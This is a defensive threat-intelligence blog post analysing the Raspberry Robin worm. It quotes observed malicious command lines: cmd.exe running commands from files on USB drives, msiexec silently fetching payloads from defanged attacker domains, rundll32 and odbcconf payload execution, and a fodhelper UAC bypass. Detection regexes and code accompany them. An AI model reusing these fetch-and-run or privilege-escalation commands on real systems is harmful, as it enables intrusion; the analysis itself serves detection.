Tuesday, December 13, 2022

Raspberry Robin: Highly Evasive Worm Spreads over External Disks


Introduction

During our threat hunting exercises in recent months, we have started to observe a distinctive pattern of msiexec.exe usage across different endpoints. As we drilled down to individual assets, we found traces of a recently discovered malware called Raspberry Robin. The Red Canary Research Team first coined the name for this malware in their blog post [1], and Sekoia published a Flash Report about the activity under the name QNAP Worm [2]. Both articles offer great analysis of the malware's behavior. Our findings support and enrich prior research on the topic.

Execution Chain

Raspberry Robin is a worm that spreads over external drives. After initial infection, it downloads its payload through msiexec.exe from QNAP cloud accounts, executes its code through rundll32.exe, and establishes a command and control (C2) channel through TOR connections.

Image 1: Execution chain of Raspberry Robin

Let's walk through the steps of the kill chain to see how this malware functions.

Delivery and Exploitation

Raspberry Robin is delivered through infected external disks. Once connected, cmd.exe tries to execute commands from a file within that disk. This file is either a .lnk file or a file with a specific naming pattern. Files with this pattern exhibit a 2 to 5 character name with a usually obscure extension, including .swy, .chk, .ico, .usb, .xml, and .cfg. Moreover, the attacker uses a considerable amount of whitespace/non-printable characters and changing letter case to evade string matching detection techniques. Example command lines include:

  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /RCmD<qjM.chK
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /v /c CMd<VsyWZ.ICO
  • C:\Windows\System32\cmd.exe [redacted whitespace/non printable characters] /R C:\WINDOWS\system32\cmd.exe<Gne.Swy

A file sample for delivery can be found at this URL:
https://www.virustotal.com/gui/file/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/relations

Next, we observe explorer.exe running with an obscure command line argument, spawned by a prior instance of cmd.exe. This obscure argument seems to take the name of the infected external drive or of the .lnk file that was previously executed. Some of the samples had values including USB, USB DISK, or USB Drive, while some other samples had more specific names. On every instance of explorer.exe we see that the adversary is changing the letter case to evade detection:

  • ExPLORer [redacted]
  • exploREr [redacted]
  • ExplORER USB Drive
  • eXplorer USB DISK
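The padding and letter-case tricks above defeat naive string matching, so a detection has to normalize the command line first. As an added example (not code from the original post), the check below strips whitespace and non-printable characters, lower-cases the line, and only then looks for cmd.exe reading its commands from a redirected file with one of the listed extensions; the sample lines, the padding characters and the "USB DISK" volume name are constructed.

```python
import re

# Constructed sample process command lines, modelled on the patterns quoted
# above; "\x0b\x1f" etc. stand in for the redacted whitespace/non-printable
# padding and "USB DISK" for the redacted external disk name.
SAMPLES = [
    "C:\\Windows\\System32\\cmd.exe \t\x0b\x0c \x1f  /RCmD<qjM.chK",
    "C:\\Windows\\System32\\cmd.exe \u00a0\u2003\x00 /rcMD<USB DISK.LNk:qk",
    "C:\\Windows\\System32\\cmd.exe   \x1f  /v /c CMd<VsyWZ.ICO",
    "C:\\Windows\\System32\\cmd.exe      /R C:\\WINDOWS\\system32\\cmd.exe<Gne.Swy",
    "C:\\Windows\\System32\\cmd.exe /c dir C:\\Users",                # benign
    "C:\\Windows\\System32\\cmd.exe /c sort < names.txt > out.txt",   # benign
]

# Extensions the post lists for the delivery file, plus .lnk for the ADS form.
SUSPICIOUS_EXT = {".swy", ".chk", ".ico", ".usb", ".xml", ".cfg", ".lnk"}

# The actual signal: cmd.exe itself reading its commands from a file through
# stdin redirection ("cmd<file" or "cmd.exe<file"), not a tool redirected by cmd.
STDIN_REDIRECT = re.compile(r"cmd(?:\.exe)?<([^<>|&]+)$")


def normalize(cmdline: str) -> str:
    """Undo the case-changing and whitespace/non-printable padding by dropping
    every non-printable or whitespace character and lower-casing the rest."""
    return "".join(c for c in cmdline if c.isprintable() and not c.isspace()).lower()


def delivery_indicator(cmdline: str):
    """Return the file cmd.exe reads its commands from when the line matches
    the delivery pattern described above, otherwise None."""
    norm = normalize(cmdline)
    if "cmd.exe" not in norm:
        return None
    m = STDIN_REDIRECT.search(norm)
    if not m:
        return None
    source = m.group(1)
    # Drop an NTFS alternate data stream name ("disk.lnk:qk" -> "disk.lnk")
    # before looking at the extension.
    base = re.sub(r"(\.\w+):\w+$", r"\1", source)
    ext = "." + base.rsplit(".", 1)[-1] if "." in base else ""
    return source if ext in SUSPICIOUS_EXT else None


def scan(cmdlines):
    """Return (original line, source file) for every flagged command line."""
    hits = []
    for line in cmdlines:
        src = delivery_indicator(line)
        if src:
            hits.append((line, src))
    return hits
```

The extension list is what keeps a legitimate `cmd.exe < script.txt` out of the results; widen it only with care.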

Installation

After delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload. It uses -q or /q along with the standard install parameter to operate quietly. Once again, mixed case letters are used to evade detection:

  • mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
  • mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
  • MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
  • mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
  • msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
  • MSieXEC -Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]

As you can see above, URLs used for payload download have a specific pattern. Domains use 2 to 4 character names with obscure TLDs including .xyz, .hk, .info, .pw, .cx, .me, and more. URL paths have a single directory with a random string 11 characters long, followed by the hostname and the username of the victim. On network telemetry, we also observed the Windows Installer user agent due to the use of msiexec.exe. To detect Raspberry Robin through its URL pattern, use this regex:

^http[s]{0,1}://[a-zA-Z0-9]{2,4}\.[a-zA-Z0-9]{2,6}:8080/[a-zA-Z0-9]+/.*?(?:-|=|\?).*?$
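As an added example that is not part of the original post, the regex above (with the `.` and `?` escapes that are easily lost when it is copied) applied to URLs pulled out of msiexec command lines in the same mixed-case, no-space form as the samples; the hostnames, path strings, computer names and user names in the samples are constructed.

```python
import re

# The post's URL regex: the "." between host labels and the "?" in the
# alternation must be literal. IGNORECASE is added here so that a mixed-case
# scheme such as "hTtP://" on a process command line still matches.
RR_URL = re.compile(
    r"^http[s]{0,1}://[a-zA-Z0-9]{2,4}\.[a-zA-Z0-9]{2,6}:8080/[a-zA-Z0-9]+/.*?(?:-|=|\?).*?$",
    re.IGNORECASE,
)

# msiexec quiet-install switches in any case, with or without spaces before the URL.
MSIEXEC_URL = re.compile(r"msiexec\s+[-/]q\s*[-/]i\s*(https?://\S+)", re.IGNORECASE)

# Constructed command lines following the quoted patterns; hosts, paths and names are made up.
SAMPLES = [
    "mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/aB3dE5fG7hJ/DESKTOP-1A2B=alice",
    "MSieXEC -Q-ihtTp://aIj[.]HK:8080/zxcvbnmasdf/WIN-HOST?bob",
    "msiexec /q /i https://downloads.example.com/setup.msi",   # benign: long host label
    "msiexec /i C:\\temp\\app.msi /qn",                        # benign: local package
]


def extract_payload_url(cmdline: str):
    """Pull the install URL out of an msiexec command line, or None."""
    m = MSIEXEC_URL.search(cmdline)
    return m.group(1) if m else None


def is_raspberry_robin_url(url: str) -> bool:
    """Apply the post's pattern; a defanged "[.]" is refanged first so that
    IoC-style strings and live telemetry test the same way."""
    return RR_URL.match(url.replace("[.]", ".")) is not None


def flag_msiexec(cmdline: str):
    """Return the URL when an msiexec line fetches from a Raspberry Robin style
    short-domain:8080 path with the host/user separator, otherwise None."""
    url = extract_payload_url(cmdline)
    return url if url and is_raspberry_robin_url(url) else None
```

Network telemetry (proxy or NetFlow URL fields) can feed is_raspberry_robin_url() directly; the msiexec extraction is only needed for process-creation logs.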

If we look up the WHOIS information for the given domains, we see domain registration dates going as far back as February 2015. We also see an increase in registered domains starting from September 2021, which aligns with the initial observations of Raspberry Robin by our peers.

WHOIS Creation Date    Count
12/9/2015 1
10/8/2020 1
11/14/2020 1
7/3/2021 1
7/26/2021 2
9/11/2021 2
9/23/2021 9
9/24/2021 6
9/26/2021 4
9/27/2021 2
11/9/2021 3
11/10/2021 1
11/18/2021 2
11/21/2021 3
12/11/2021 7
12/31/2021 7
1/17/2022 6
1/30/2022 11
1/31/2022 3
4/17/2022 5

Table 1: Distribution of domain creation dates over time


Associated domains have SSL certificates with the subject alternative name q74243532.myqnapcloud.com, which points to the underlying QNAP cloud infrastructure. Moreover, their URL scan results return login pages of the QTS service of QNAP:

Image 2: QNAP QTS login page from associated domains

Once the payload is downloaded, it is executed through various system binaries. First, rundll32.exe uses the ShellExec_RunDLL function from shell32.dll to leverage system binaries such as msiexec.exe, odbcconf.exe, or control.exe. Those binaries are used to execute the payload stored in C:\ProgramData\[3 chars]\

  • C:\WINDOWS\system32\rundll32.exe shell32.dll ShellExec_RunDLL C:\WINDOWS\syswow64\MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:\ProgramData\Azu\wnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
  • C:\Windows\system32\RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:\Windows\syswow64\odbcconf.exe -s -C -a {regsvr C:\ProgramData\Tvb\zhixyye.lock.} /a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN dgye AVRAU pzzfvzpihrnyj}
  • exe SHELL32,ShellExec_RunDLLA C:\WINDOWS\syswow64\odbcconf -E /c /C -a {regsvr C:\ProgramData\Euo\ikdvnbb.xml.}
  • C:\WINDOWS\system32\rundll32.exe SHELL32,ShellExec_RunDLL C:\WINDOWS\syswow64\CONTROL.EXE C:\ProgramData\Lzm\qkuiht.lkg.

It is followed by the execution of fodhelper.exe, which has the autoElevate bit set to true. It is frequently leveraged by adversaries in order to bypass User Account Control and execute additional commands with escalated privileges [3]. To detect suspicious executions of fodhelper.exe, we suggest monitoring its instances without any command line arguments.

Command and Control

Raspberry Robin sets up its C2 channel through the additional execution of system binaries without any command line argument, which is rather unusual. That most likely points to process injection, given the elevated privileges obtained in previous steps of execution. It uses dllhost.exe, rundll32.exe, and regsvr32.exe to set up a TOR connection.

Detection through Global Threat Alerts

In Cisco Global Threat Alerts, available through Cisco Secure Network Analytics and Cisco Secure Endpoint, we track this activity under the Raspberry Robin threat object. Image 3 shows a detection sample of Raspberry Robin:

Image 3: Raspberry Robin detection sample in Cisco Global Threat Alerts

Conclusion

Raspberry Robin tries to remain undetected through its use of system binaries, mixed letter case, TOR-based C2, and abuse of compromised QNAP accounts. Although we have the same intelligence gaps as our peers (how it infects external disks, what its actions on objective are), we are continuously observing its activities.

Indicators of Compromise


References

  1. Raspberry Robin gets the worm early – https://redcanary.com/blog/raspberry-robin/
  2. QNAP worm: who benefits from crime? – https://7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/FLINT%202022-016%20-%20QNAP%20worm_%20who%20benefits%20from%20crime%20(1).pdf
  3. UAC Bypass – Fodhelper – https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
